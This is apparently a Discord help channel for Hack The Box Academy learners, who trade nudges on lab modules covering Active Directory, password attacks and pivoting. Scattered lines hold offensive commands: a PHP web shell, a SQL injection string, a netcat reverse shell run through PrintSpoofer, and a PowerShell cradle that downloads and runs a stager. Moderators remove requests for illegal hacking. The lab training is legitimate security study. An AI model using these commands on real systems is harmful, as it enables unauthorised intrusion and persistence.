#modules

1 messages · Page 435 of 1

rustic sage
#

@fathom pendant dms if possible, i need to re-link i explained the reasoning

cloud urchin
rustic sage
#

I cannot do it because i swapped to a discord

cloud urchin
rustic sage
#

Ofc

unkempt steppe
#

Hai guys ,i need any cybersecurity project idea for my final year project , let me Know ? Any stuffs

cloud urchin
slim coyote
#

WHAT THE FUCK DID YOU JUST CALL HIM?

proud crescent
#

in Dynamic Analysis the .exe that i created works fine with my pc ( av turned on ) but doesn't work in the vm ( the ips and port is right also i tried both udp and tcp vpn ) it doesn't get flagged edit : after trying port 8080 it worked

novel onyx
#

anyone up?

sacred ermine
#

anyone was able to get a revshell on dc01 for WSUS section in windows lateral movement module ?

#

sync the time probably?

#

I relate

waxen totem
#

was about to say... dogekek

sacred ermine
#

actually the first one, I am tryna get the revshell on dc01

#

no

#

the WSUS section for windows lateral movement

#

can I dm so I can show what I have tried ?

brave field
#

Hi! Is anyone doing Using CrackMapExec module? I am using the latest (upgraded to latest commit) NetExec from GitHub and it when trying out the get-network and daclread modules, it gives out errors. However, it's working using the same commands on the Kali Linux NetExec version. Anyone faced this? Thanks.

dusty blaze
#

Hi guys , why is the modules filter not working ?

vagrant bluff
#

hello good ppl can you help me please iam trying to solve this " Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio." from Pass the Ticket (PtT) from Linux idk i am stuck !! can you tell me where am i going wrong?

#

plzz plzz plzz help me out here

twilit gazelle
#

I'm so confused about which OS to use, I'm using Kali for last few months but I would like to know what do you guys use, Kali or parrot and why you chose one over the other.

#

Also why am I not able to chat on #general

vagrant bluff
twilit gazelle
#

Yeah, but parrot have pre configured tor and anon surf and Kali lacks them

vagrant bluff
vagrant bluff
twilit gazelle
#

Which one better for opsec?

vagrant bluff
#

i use kali and the box on HTB works perfect

twilit gazelle
#

I see

#

Maybe I'm being over dependent on tools

vagrant bluff
twilit gazelle
#

Sounds better 😉

vagrant bluff
acoustic dome
#

hi guys, i have a question. since i cant type in general, i would have to ask here

waxen totem
#

@acoustic dome @twilit gazelle this is not #general please read and follow instructions in #welcome to gain access there and chat there, please keep this channel on topic

acoustic dome
#

okay, thanks

waxen totem
#

Oh look we can also see which user and group owns the file

vagrant bluff
#

i tried with both the tickets of julio@inlanefreight.htb its same every time :""(

waxen totem
#

What's the error say?

#

wait nvm, why are you specifying the /root directory? 😅 check the directory in which the files are located

vagrant bluff
#

no error klist: No credentials cache found (filename: /root/krb5cc_647401106_" after i export it

vagrant bluff
#

omg it worked thank youuuuu so much\

stuck moss
#

Hi

waxen totem
fierce tundra
#

May i ask about questions in Password Attack module? It about days i stuck in that questions

waxen totem
fierce tundra
#

About questions in Password Attack module? It about days i stuck in the both first questions

fierce tundra
#

Questions in Password Attack module... What are the answer for the both first questions

cinder plinth
#

Please who knows how to hack

waxen totem
cinder plinth
#

To be sure to be in a good group

waxen totem
cinder plinth
#

D'accord

full patio
#

How can we offer some feedback on a module?

novel matrix
grizzled schooner
#

For Attacking Common Services | Attacking Email

I've attempted to brute-force credentials for smtp, pop3, imap, and tried o365spray - I didn't get results for any of the services. Could I get a hint? Possibly non-default port?

digital willow
#

hi, anyone could give me a nudge on 'password attacks' module?

grizzled schooner
#

I can try, whatcha got

digital willow
#

specifically on Pass The Certificate

grizzled schooner
#

What do you need a nudge on?

digital willow
#

this error, when running ntlm-relayx

grizzled schooner
#

What's the syntax you used to run it?

digital willow
#

impacket-ntlmrelayx -t http://IP/file.asp --adcs -smb2support --template KerberosAuthentication

grizzled schooner
#

for -t did you use CA01

digital willow
#

yes

grizzled schooner
#

Is it in your hosts file?

digital willow
#

yes

grizzled schooner
#

what's the .asp file you put in there?

robust nebula
buoyant flame
#

Why can’t i start chatting in general?

dark hedge
wispy fable
#

In the student subscription "Direct access to all modules up to (including) Tier II" Means I get to use all the modules with no cube cost and get the cube rewards? Also what happens when the subscription is over. Do I lose access to all of those modules or only incomplete ones?

dark hedge
wispy fable
#

Thank you! So it seems to be worth it when comparing the price with the other subscriptions?

dark hedge
ashen light
#

Hi, I ask information about the first step to escalation with PrintSpoofer64. I make all step but when run this command:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c “c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd”
I receive this error:
172.16.8.20[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening…
CreateProcessAsUser() failed. Error: 216

I think it's a problem with the version of netcat so I tried another one, but it doesn't work any better

Anyone can help me please ?

eager jay
#

anyone available to give me a nudge onthe Passwords Attack module?

solemn moon
ashen light
solemn moon
#

hmm, then I have no idea :((

waxen totem
ashen light
#

I just tested it, but it doesn't work any better.

past fern
#

Hi guys pls if someone has done the wordpress hacking module im stuck in the flag when exploiting a Local File Inclusion vulnerability Ive finished the module but i couldn't find that single flag idk how im supposed to know its name to read it...

timber goblet
#

Hi
Am not able to ping windows boxes in Password Attack module. I tried changing vpns, tried pwnbox as well. Doesn't work, is this a bug or somehting?

tawny plume
#

Try using nmap with the -P0 flag it might be the box doesn't respond to ICMP pings

#

Username seems accurate 😭

west arrow
#

Hello can anybody give me a nudge on "Linux Privesc Skill assessment ---> Flag # 3".
Been enumerating and trying exploits but they don't seem to work, been stuck for quite a few hours on this flag

bold mauve
#

Hi I am currently doing the windows attack and defense module from the SOC Path.
In the section on kerberoasting they say we need to connect to DC1 on IP 172.16.18.3 but I am unsure how to do that I am on my personal kali VM and connect via VPN. I used RPD to connect to the WS001 machine for the first question but I am unsure how to continue.

Sorry if this a dumb question. I can ping the IP address from the WS001 machine

timber goblet
bold mauve
#

yes I am able to ping it I should have made it clearer

timber goblet
#

why do you even need it??

west arrow
hot kettle
#

Can anyone tell me how to hack my own wifi

west arrow
hollow thorn
timber goblet
timber goblet
hollow thorn
timber goblet
hot kettle
#

I tried the handshake method

#

But it didn't work

hot kettle
timber goblet
hollow thorn
hollow thorn
timber goblet
hot kettle
hollow thorn
bold mauve
hollow thorn
#

😭

timber goblet
timber goblet
hollow thorn
hot kettle
#

I only got an esp and a slow lap

west arrow
hollow thorn
hot kettle
#

32 devkit v1

timber goblet
hollow thorn
hollow thorn
#

I think so not sure

timber goblet
#

if its a weak password, do a dictionary attack

bold mauve
west arrow
#

on the page your on, look in the top right corner

bold mauve
#

ah ok thank, but no its not there

cloud urchin
#

@fresh oracle Discussion of illegal activity is not allowed here. Please read the #rules.

#

@west arrow Please refrain from posting content from modules above tier 0.

west arrow
#

mybad sorry

#

Can anybody give me a nudge on "Linux Privilege Escalation Skill assessment ---> Question/Flag # 3".

Been enumerating and trying exploits but they don't seem to work, been stuck for quite a few hours on this flag

robust nebula
#

Hey, did anyone ever get the error [X] Error executing the domain searcher: A local error has occurred. when trying to kerberoast cross forest with rubeus?

west arrow
fierce tundra
#

Answer required in Password Attack Introducing John The Ripper module... What are the answer for the both first questions?

terse bloom
#

Why is the final task in shells & payloads an absolute torture? Why can't we use our own systems. The initial "foothold box" is absolutely inconvenient to use...

fathom pendant
terse bloom
spring root
#

Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>? I'm getting u"ㅈÀ" but it's inccorect

fathom pendant
#

try changing vpn regions, use tcp instead of udp

fathom pendant
#

+16 -> +10 in hex

spring root
dim dust
#

Hello

fathom pendant
terse bloom
fathom pendant
terse bloom
#

ah i see

azure turtle
#

i think theres a slight misunderstanding. the command he injected was <?php echo shell_exec($_GET['cmd']); ?> instead of the other one where you do <?php system... and then $_GET. unless you actually mean that command is literally using bash to do something with echo which i do not understand.

#

||also the php system one would crash the skills assessment.|| not gonna say where cause it might be a spoiler

fathom pendant
#

shell_exec and system do practically the same thing

#

there's some minor differences

azure turtle
#

since its all about file inclusions and path could mean anything

fathom pendant
#

¯_(ツ)_/¯

pure dove
#

I did got stuck in the same lab Footprinting-easy. How did you found the flag?

echo mulch
#

Hi there,please i need someone to put me through hack the box I don't have money to get cubes how do I accumulate more cubes cause for free so I can get ,ore modules please can anyone here render help to me ?

grizzled schooner
#

Anyone got a sec to help with Attacking Common Services | Easy Skill Assessment

#

I was able to find a user, and have enumerated most of the options, except for one [SQL] when trying to do so, I encounter these errors

└─$ mysql -u <user I found> -h 10.129.16.20 ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

I then tried

└─$ mysql -u <user I found> -h 10.129.16.20 --skip-ssl ERROR 1045 (28000): Access denied for user 'fiona'@'my vpn IP' (using password: NO)

NOTE: This login had worked before I went to lunch. I came back, restarted the box and now I am encountering this. Even after a couple of machine resets

EDIT: Had to change syntax after troubleshooting to include the pw in the login command

haughty fiber
#

i cant understand how to get tomcat credentials in shells and payloads: live engagement

haughty fiber
#

yooo

#

now i feel dumb

green shuttle
#

hi i am in attacking domain trusts cross forest from linux section , in Active Directory Enumeration & Attacks module and while i ran the Getspnusers i got

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

#

can't install ntpdate

#

if anyone could help , i would appreciate it

#

Note : i got the users just not the hash

leaden island
#

yo guys
im on ACL enum, and one of the questions requires me to get the GUID from the AD right
the section mentions how to get the right from the GUID using Get-ADObject or -ResolveGUIDs with powerview, but not the opposite
any idea

pure dove
fathom pendant
vocal oriole
#

hi guys do u also have problems with the academy vpn?

#

since yesterday i ve had no acces to the academy vpn whatsoever

#

are the vpn servers down?

fathom pendant
#

in the ovpn file there should be a host it connects to; try pinging that host

rustic sage
#

Can anybody tell me what STDNT in linnux means?

#

I'm doing hack the box and iam stuck on the section STDNT

fathom pendant
#

that really doesn't help or explain the issue

rustic sage
#

Okay hold on.

#

How many files exist on the system that have the ".log" file extension?

#

Here is the question? Is this related to stdin?

pure dove
pure dove
fathom pendant
limpid siren
#

help

pure dove
#

Yeah I did logged in correct ftp. There is a firewall that's blocking the connection

#

ftp> ls -R
229 Entering Extended Passive Mode (|||46679|)
150 Opening ASCII mode data connection for file list
226 Transfer complete.I'm getting these while I running the commands

limpid siren
#

Im in attacking web applications with ffuf module, in the assessments section the extension fuzzing is expecting another diff extension idk what I'm doing wrong

grizzled schooner
#

Need a nudge on Attacking Common Services | Easy Skill Assessment

Don't want to give away spoilers either, so please delete if not allowed.

Found the foothold and have found that the use of ||LOAD_FILE|| seems to work, however, I can't get a shell to pop... Any hints?

frank kelp
#

I asked this in the community help zone but that might be the wrong place.

I'm on the AI red teaming path on Direct Prompt Injection 1.

The flag I get says it's incorrect for the answer. I've tried multiple connections and box resets but I get the same flag each time regardless.

jaunty nimbus
#

sorry Im typing this here

#

how do I solve this error This Account Identifier does not appear to be the right length (must be 60 characters long).

haughty fern
#

I’m having the same problem too 🥲

fathom pendant
frank kelp
limpid siren
vocal oriole
fathom pendant
vocal oriole
#

this keeps on going forever, tried to switch servers, protocol, everything and still nothing

pure dove
halcyon hare
#

Hi everyone. Can someone give me a nudge on LLM Output Attack Skills Assessment? Thanks!

distant magnet
#

Hi

#

@plain oasis thanks and sorry:) (I don’t mean in bad way)

halcyon hare
thorn quarry
#

’m on page “<tabTitle>Network Foundations</tabTitle>” with “<selection>+ 0 What RFC specifies private IP ranges? </selection>” selected.

I dont know how to answer thsi question,

fathom pendant
#

Ctrl+f for rfc

thorn quarry
#

I mean the format,
This the answer of the question

Defined by RFC 1918, common IPv4 private address ranges include 10.0.0.0 to 10.255.255.255, 172.16.0.0 to 172.31.255.255, and 192.168.0.0 to 192.168.255.255

#

They highlighted this sentence in the solution section, but i dont know how the answer should be written

fathom pendant
#

"What rfc defines private ip ranges" its asking for the rfc #

thorn quarry
#

Thanks

quasi wave
#

Hi has anyone here done the wifi modules and I know this sounds dumb but if I want to do wifi modules will I be able to get help on those too or has no one done them?

#

Like I don’t plan on doing them right now necessarily but I am interested in doing them in the future

#

When I have tier 3 access to academy because eventually I’m gonna upgrade

#

Because I know most wifi modules are tier 3

stark thunder
#

The Correct one is : tom ' OR '1'='1 > in the username and you leave the password empty. you can understand it this way.

barren apex
#

anyone knows that's the problem might be?
the Target(s) are spawning... takes forever.

feral temple
#

Hey y'all

fathom pendant
#

@feral temple not what this server is about. That's illegal

feral temple
#

My bad

#

Won't happen again

heady hare
#

Good afternoon, everyone. This is my first time seeking help. I am currently in the Password Attacks module. All the mutation lists I have created are large, and it seems like the Hydra Tool does not have a chance of validating the entire list in two hours. I have already cut the list into chunks, but no luck yet. Any suggestions?

fathom pendant
heady hare
#

@barren apex When that happens to me, Windows+Key and R, and then, %temp%, and delete all temps... and re-start the computer...

fierce tundra
#

Answer required in Password Attack session in Introducing John The Ripper module... What are the answer for the both first questions?

heady hare
#

@fathom pendant Well! I am trying to mimic the same format of the example Password I received as Information "Texas123!@#" - One word, 3 numbers and 3 Symbols...

rain mirage
glacial remnant
#

hey all im working on the last question on.

"AD Enumeration & Attacks - Skills Assessment Part I"

It wants me to perform a dcsync however the cleartext creds i got for the user dont seem to let me auth to the 1st target, MS01 (2nd target) or the DC.

they seem to be the correct set of creds since the previous answers accepted them but feel like im missing something basic here and looking for a hint.

fathom pendant
glacial remnant
#

i actually never tried RDP, i went with SMB

#

also psexec

#

so far i can SMB and psexec to ms01 with the previous account password found, so all my tunnels seem right just seems like creds are the issue but the creds i used for the questions were right 🤔

charred mountain
#

Hi Guys. I'm actually stuck on Skill Assessment of Password Attack Module and I need some hint. It seems that the user that I have (hw...) don't have the right privilege to do what I think that I need to do in jump01 (pr::). I already enumerate the other users from domain but without success about the pass. I already enumerate the other proto and found more files, but my file enumerating technique seems not working very well through the pivot. Am I on the right path?

fathom pendant
fathom pendant
#

Snaff can point to a file

charred mountain
glacial remnant
charred mountain
#

I ran from J against F

fathom pendant
#

But hw has access to files

fathom pendant
tulip minnow
#

hi

#

anyone facing issue where upload files button not working lol?

#

any help would be appriciated 🙂

fathom pendant
cloud urchin
#

@tulip minnow Please read the rules and do not DM people without permission.

tulip minnow
#

sorry i just asked him to check #modules didnt know wont do it again

fathom pendant
charred mountain
#

ty @fathom pendant for the hint of {black}. I was a little confused about that whole output, but with this hint and following the trail, I was able to finish the skill assessment.

sand rose
#

Hello guys. I'm struggling with cracking these hashes in the Active Directory Module for the LLMNR poisoning from windows. I have 6 outputs from running responder. I put them into a file and I'm running "john hashlist.txt --format=netntlmv2 --wordlist=...."

I'm not sure if the command doens't work, or if the wordlists ive tried just don't have the passwords or what... but I was looking for guidance on if I'm missing something. I've gotten used to john for cracking hashes... do I have to use hashcat, or does it not make a significant difference? Thanks in advance.

cloud urchin
sand rose
cloud urchin
#

if one isn't provided the first one i'd try is rockyou

#

try that if you haven't

#

it's generally the 'default' list

sand rose
#

Is rockyou in seclists? When I try to locate it in my VM I dont see it, so I assume its not? Im on my phone and will try tomorow. Just trying to get pointed in the right direction for now.

cloud urchin
#

i don't think so. on kali i think you need to unzip it first. just try something like locate rockyou

sand rose
#

What does the * denote here? I tried locate rockyou and nothing showed. So I might need to hunt it on github

cloud urchin
#

yeah don't use it

#

just do locate rockyou

#

it looks like it is in my seclists, but it's zipped up

sand rose
#

Ill double check it tomorrow... whats the linux tool used to unzip stuff?

rare hornet
#

Anyone who talks about TryHackme is a traitor?

cloud urchin
halcyon hare
#

Hi Guys. I’m stuck on the Skills Assessment of the LLM Output Attack module. Can anyone assist me on that? Thanks!

opal crater
#

hello guys can anyone help me with information gathering -web edition: fingerprinting

#

i am stuck i did as per the instruction but i dont get back cur, wafw00f or nikto response

ornate kiln
cloud urchin
opal crater
#

anyone can help me in information gathering - fingerprinting

#
  1. added the ip and subdomain to vhost file
  2. used curl
  3. used wafw00f
  4. usd nikto
    nothing is working
opal crater
#

first question

wooden seal
opal crater
#

ok

#

i cant dm you @wooden seal

wooden seal
#

Pentest in a nutshell
Windows VA (submodule)
cant rdp to target
getting timedout for some reason
error:
[11:20:22:802] [1967:1968] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0 [11:20:22:803] [1967:1968] [WARN][com.freerdp.crypto] - CN = [11:20:32:483] [1967:1968] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation [11:20:32:487] [1967:1967] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

limpid siren
wooden seal
fallen wigeon
#

Guys I am Having a problem in a academy module named "Network Foundations" and I have done all the section and the final section is left called "Skill Assessment"

This section has like 3 chapters in it to solve the assessment but I am having the problem in third chapter

nc -v 10.129.174.32 21
10.129.174.32 [10.129.174.32] 21 (ftp) open
220 Microsoft FTP Service
USER anonymous^M
331 Anonymous access allowed, send identity (e-mail name) as password.
PASS anything^M
230 User logged in.
PASV^M
227 Entering Passive Mode (10,129,174,32,194,11).

after this command I had to open an another terminal and connect to the FTP data channel I HAVE ALSO calculated the dynamic port by last two number and I gave the command to the next terminal but this is I am getting . Can anybody help

nc -v 10.129.174.32 49675
10.129.174.32 [10.129.174.32] 49675 (?) : Connection refused

opal crater
fathom pendant
opal crater
#

i connect to academy from virtual box, i can ping the traget but cant curl what is the issue

opal crater
#

i think hack the box is disaster to subscribe

#

i cant even do it from attack box

fathom pendant
#

Are you running the pwnbox and your vm at the same time?

opal crater
#

no i tried in pwn box after i failed in my vm

#

i failed in both

#

@fathom pendant

fathom pendant
#

You don't have to @ me

opal crater
#

sorry

#

forgive me

fathom pendant
#

Try changing vpn regions and downloading a new vpn

opal crater
#

ok

fallen wigeon
solemn moon
#

Hi, I am doing the Attacking Enterprise Networks module and I am stuck on the Internal Information Gathering part. Here is what I did:
In the OpenVPN / Pwnbox I tried both of them and have reset the target machine and the pwnbox 2-3x times, I also regenerated the OpenVPN file:
ssh -D 8081 -i dmz01_key root@machine_ip

netstat -antp | grep 8081
Output: tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN 122808/ssh

grep socks4 /etc/proxychains.conf
Output: socks4 127.0.0.1 8081

Now the next command is to use Nmap with Proxychains to scan the dmz01 on its' second NIC, with the ip 172.16.8.x
This is the expected output:
ProxyChains-3.1 (http://proxychains.sf.net/)
Starting Nmap 7.92 ( https://nmap.org/ ) at 2022-06-21 21:15 EDT
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:80-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:80-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:22-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:21-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:8080-<><>-OK
Nmap scan report for 172.16.8.120
Host is up (0.13s latency).

PORT STATE SERVICE
XX/tcp open XXX
XX/tcp open XXX
XX/tcp open XXXX
XXXX/tcp open XXXXXXX

But for me it just:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-07-16 14:22 CEST
Nmap scan report for 172.16.8.120
Host is up (0.00060s latency).

PORT STATE SERVICE REASON
XX/tcp filtered ftp no-response
XX/tcp filtered ssh no-response
XX/tcp filtered http no-response
XXXX/tcp filtered http-proxy no-response

Nmap done: 1 IP address (1 host up) scanned in 1.31 seconds

#

MarcieLee said not to worry about the state, but I don't know :((

left lintel
#

you could just upload nmap and run it internally

solemn moon
#

thank you, ill try

left lintel
#

it'll work

#

or you can use ligolo it'd probably work

solemn moon
#

it worked THANK YOUU<3

warm shadow
#

Hi all i have huge problem with module SQLMap Essentials

I don't even know if i have problem with connection.

Everytime when i want to solve tasks (for example Case #2) during my attack sqlmap can't connect to target page. i have communications like

[05:28:25] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[05:28:25] [WARNING] there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests
[05:28:25] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)

endless loop

trying to do case#2
sqlmap 'http://94.237.57.211:49442/case2.php' --data 'id=1'
sqlmap '94.237.57.211:49442/case2.php' --data 'id=1
sqlmap 'http://94.237.57.211:49442/case2.php' --data 'id=1'
sqlmap 'http://94.237.57.211:49442/case2.php?id=1' --batch --dump
sqlmap 'http://94.237.57.211:49442/case2.php' --data 'id=1*&name=test

nothing works. Any hints?

rustic sage
#

$ sudo mysql -u root -h 83.136.253.59 -P 55835 -p

Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

┌──(kiki㉿kali)-[~/mysql-ssl]
└─$ mysql -u root -h 83.136.253.59 -P 55835 -p

Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

why this happened to me ?

calm dew
#

hi, can i get some help with the penetration tester path/password attack/last cuestion? im unable to make the dc do send a shell using powershell

vague rivet
vague rivet
#

Then let me just ask because I've been stuck since yesterday and both my tricks and the walkthrough aren't working.

calm dew
#

could you help me with mine?

vague rivet
calm dew
#

pass the hash, last cuestion, not the optional one, im unabkle to make the dc send the shell or the windows to get it idk

indigo sigil
#

im on that right now, I need help

ssh htb-student@ip

#

I need help

jade sundial
#

How can I heck my network so that the users in my LAN can get slow internet speed

#

Please help me in this regard

acoustic owl
mighty coral
#

i have a problem with the nibbles box

#

when i go to ip-address/nibbleblog it just keeps loading and doesnt show anything

#

its part of the getting started module

eager siren
#

Any help on the LLM OUTPUT ATTACKS, skill assessment??

dreamy halo
#

Hey , how to have the permission to write in "general" ? Like is there a privilege Escalation for it ?

warm shadow
dreamy halo
wooden seal
warm shadow
#

yeah exacly same

#

*excactly

mighty coral
#

nvm its not working again 😭

buoyant flame
#

hello, i cannot find any reports, please provide insight. @ me\

Do some research and find examples of penetration test reports and pick out the essential features. Get an overview of the following:

  1. What topics have been covered?
  2. How are they structured?
  3. How are they presented?
remote compass
#

Hi guys, I do need some help. I am stuck on the last flag of the skills assessment of Web Proxies module. I have tried a lot of different things but it is impossible to send the metasploit requests into ZAP for further modifications. I have configured /etc/proxychains, I launch msfconsole with proxychains in front of it. I set Proxies in metasploit and in ZAP (both are the same)...I think I have tried everything I could at this point. If someone has an idea I would like to ear it 🙂 I am running ubuntu and connect to HTB via the VPN.

charred mountain
# calm dew anyone?

Hi. Probably there are more then one way to complete the exercise, and maybe you didn't need a rev shell

junior fjord
#

what is ?

#

this

#

the worst module i ever studied "linux privesc" machines are damn slow

#

and not working properly, i am root but "permission denied" ?

#

please help

ashen harness
#

Hi everyone, I'm having a lot of trouble with an exercise in the bash module (https://academy.hackthebox.com/module/21/section/128). I've been trying to solve it for over an hour. I asked chatgpt for help, but the flag variable either returned empty or this error occurred:
*** WARNING: Deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
40273C44B57F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
I don't know what to do.

#

I talked a little more with chatgpt. His response was that the flag returns empty.

desert widget
craggy edge
craggy edge
desert widget
#

etc/passwd , env , /etc/groups , /home , df -h , whoami , id , echo $PATH, uname -a

#

any a few more

#

I dont like automation tbh

craggy edge
desert widget
#

sudo -l

craggy edge
desert widget
#

alright

craggy edge
# desert widget sudo -l

Don't rush the solution. Look at the output carefully, not to make any quick false conclusions

craggy edge
errant locust
#

heyy guys

#

i got stuck in pwn chall r0b0b1rd not totally but in a specific part

charred mountain
errant locust
#

do u want me to dm u ?

#

so i don't spoil anything or sthg

waxen totem
echo roost
#

hi, i'm doing Intro to C2 Operations with Sliver and am at the Assmued breach section using sharpsist when I run sharpersist -- -t startupfolder -c \"powershell.exe\" -a \"-nop -w hidden iex(new-object net.webclient).downloadstring(\'http://10.10.x.x:8088/stager.txt\')\" -f \"Edge Updater\" -m add I get not output

output:

#

it doesn't work and I tried it using a beacon and session

#

also tried to execute-assembly and use the stand alone SharPersist.exe with no luck

frank kelp
#

is anyone doing the AI modules and indirect injection?
Feel free to DM, I'm having issues with the flags (not asking for them to be clear, I have them but they won't submit so curious if I'm missing something).
Support has been contacted but it's extremely slow with responses so reaching out to the community again

rain mirage
#

module :- INFORMATION GATHERING - WEB EDITION
DNS Zone Transfers

i need to perform a zone transfer for inlanefreight.htb but i cant figure out the nameserver

acoustic owl
#

The name server is your target server

#

Just use this IP as nameserver

faint hamlet
rain mirage
#

but arnt the name server always like ns1,ns3

faint hamlet
acoustic owl
#

You can name your nameserver whatever you like.

rain mirage
#

so from so long i was trying to find ns server of an ns server

calm dew
calm dew
echo roost
#

Figured it out! You can't do the startup folder in a system beacon you need to be a user. I get why now.

faint hamlet
#

Moderators, ban this guy already prayge

echo roost
#

You're right anyone can access their insta acc with their username and password when they login.

acoustic dome
#

hello, is there any other way of detecting user/domain recon with splunk other than:

  1. Detecting Recon By Targeting Native Windows Executables
  2. Detecting Recon By Targeting BloodHound
timid nexus
#

How to get access to channels like general, htb-pets, etc..?

#

I can't chat in those

snow badge
lavish raven
#

Hello, If I buy the monthly plan and receive 200 cubes, will the modules I unlock with those cubes be lost after the subscription expires?

snow badge
#

Oh my mistake, I can't do it either

spring root
#

when i try to assamble mov.s i get mov.s:9: error: parser: instruction expected

spring root
gray yacht
lavish raven
gray yacht
trail salmon
#

Can anyone teach hacking here ?

lavish raven
gray yacht
lavish raven
gray yacht
lavish raven
gray yacht
tranquil narwhal
#

Hey there, I am trying to do the setting up module but have found that VirtualBox on a Windows host will not expose Intel VT‑x, has anyone found a way around this or is it just a matter of either installing linux or using different software?

cloud urchin
glad finch
#

Hi. Is it possible to share the SOC analyst path archivement on Linkedin as a 'license or certification'? I understand the CDSA cert is. But what about the path? Offsec allows to share the path archivement

acoustic owl
#

You mean the badge? Sure, you can share it wherever you want. There is even a share function

charred oar
#

hey

thorn locust
#

Hello

gleaming coral
#

Hi all,

Looking for a bit of a nudge in the right direction, trying to find the htb-student's mail file location. Feel like I am missing it somewhere obvious but any tips on where to search or a useful command is appreciated (Keen not to be given the answer, would still like to find it on my own)

thorn locust
#

Where can do a reqeust for hacking something? 😌

acoustic owl
thorn locust
#

Oké…

rich olive
#

Anybody have any tips. I just got parrot os on my phone and don't know what to do with it

#

Rclone looks fun

slate zinc
#

i would advise you using a laptop/computer

tranquil narwhal
#

Has anyone used windows Hyper-V to install Proxmox onto instead of VirualBox? Because I have an intel chip and VirtualBox on a Windows host will not expose Intel VT‑x I can't use it

fathom pendant
#

you don't need to follow the setting-up module to a T

tranquil narwhal
#

Does that mean I do not need to install Proxmox or that I should just use Hyper-V? Sorry quite new to this

#

Proxmox seems useful if we will need to create many VMs

glad flicker
#

I'm really not sure what I'm missing here. Very stuck.

re: RDP and SOCKS Tunneling with SocksOverRDP
I have established the SocksOverRDPx64.exe server running on the pivot, and have confirmed that the foothold sees it (confirmed via netstat).
When I try to connect to the final host (from foothold, with Proxifier running and configured) (or use Proxychecker.exe), I see that the connection is "actively refused".
Defender + firewall are both disabled on both foothold and pivot. Any advice on what I'm missing here please?

#

This suggests the proxy server is working correctly on the correct host, right? So why can't proxifier establish a connection on the listener? doesn't make sense

glad flicker
#

In Pivoting, Tunneling and Port Forwarding

#

this is a silly exercise when I can just RDP directly from the pivot to the target and get the flag anyway. But i'm annoyed that it isn't working when configured as above

tulip minnow
#

module?

glad flicker
#

nice troll

tulip minnow
#

HAHAHAHAH

#

whats the module name i acc wanna have a go at it'

#

looks nice

glad flicker
#

read msg

tulip minnow
#

Saw it sorry I missed it

candid portal
#

Hacking needed?

devout ginkgo
#

Does HTB have a lessons about Using Burp suite?

fathom pendant
fathom pendant
tranquil narwhal
fathom pendant
#

it's not as important as you think

#

the setting up module is just broad strokes of different things you CAN set up, but don't have to

remote compass
#

Hello everyone, I am asking my previous question again as more people are active now :). I am stuck on the last flag of the skills assessment of Web Proxies module. I have tried a lot of different things but it is impossible to send the metasploit requests into ZAP for further modifications. I have configured /etc/proxychains, I launch msfconsole with proxychains in front of it. I set Proxies in metasploit and in ZAP (both are the same)...I think I have tried everything I could at this point. If someone has an idea I would like to ear it 🙂 I am running ubuntu and connect to HTB via the VPN. How did you guys get the last challenge? Any other solution I am missing?

gray yacht
full patio
remote compass
gray yacht
gray yacht
full patio
gray yacht
cunning berry
#

hey... i'm having some problems with Logrotate. i've downloaded a new vpn and rest target a few times and get the same issue. i go through all the steps and it even says it set a symbolic link: Renamed /home/htb-student/backups with /home/htb-student/backups2 and created symlink to /etc/bash_completion.d
but there is never anything written not in /etc/bash_completion.d, /tmp or home folder, i've tried both. ||i also attempted to copy the flag, as well as create a simple bin/bash script to cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash ||

stiff aurora
#

hey guys I have a question Can you buy cubs in HTB academy for gift to other student??

#

anyone know?

stiff bone
#

Hi, who can I contact for help in private messages on the Active Directory Trust Attacks - Skills Assessment module on question 2. I tried different vectors and I ran out of options. In private messages I will show what I have already done

bitter fjord
rose oar
#

Hello
When I try to start an instance I get this message : "Request validation failed".
I have tried to log out and in again, I did ctrl+shift+r to clear my cache and reload, I changed servers and nothing worked :/

I also waited for a dozen of minutes

heady hare
#

Who is working on the Skill Assessment for the Password Attacks module? I got stuck here. I really appreciate some hints. Thanks in advance...!

heady hare
#

@snow spoke Ok, roger that

tranquil narwhal
#

Does it matter that ParrotOS says the system dioes not have enough working memory and at least 4 GiB is required? Seems like a silly question but it says the same thing in the screenshots in the setting up module haha

fathom pendant
#

You should be able to allocate at least 4GB of RAM to the vm, otherwise you get into some performance issues

foggy bone
#

Hi

waxen totem
foggy bone
#

Sorry

waxen totem
#

No need to apologize, you didn't do anything wrong, I'm just pointing you in the right direction

glacial remnant
#

alright so close on AD Enumeration & Attacks - Skills Assessment Part I and the last question
